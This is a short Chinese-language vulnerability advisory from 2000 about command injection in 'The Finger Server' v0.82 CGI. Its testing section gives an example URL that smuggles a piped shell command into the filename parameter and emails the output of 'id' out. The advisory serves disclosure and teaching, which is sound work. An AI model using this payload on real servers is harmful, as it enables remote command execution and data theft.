发布日期：2000-02-06
更新日期：2000-02-06

受影响系统：

The Finger Server v0.82

描述：

---

    <http://www.glazed.org/finger/> "The Finger Server"是一个基于WEB页面接口的“虚拟”UNIX finger服务器。但是这个守护程序却存在允许远程攻击者以"The Finger Server"运行权限（通常是"nobody"）执行任意命令的安全漏洞。




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

一个正常的URL如下：

finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

攻击者使用的URL如下：

finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|<shell code>|

例如以下URL：

finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|id|email+root@|

会将远程UNIX主机的"id"命令的运行结果以电子邮件方式返回。



建议：

---

    暂无。



浏览次数：7159
严重程度：0（网友投票）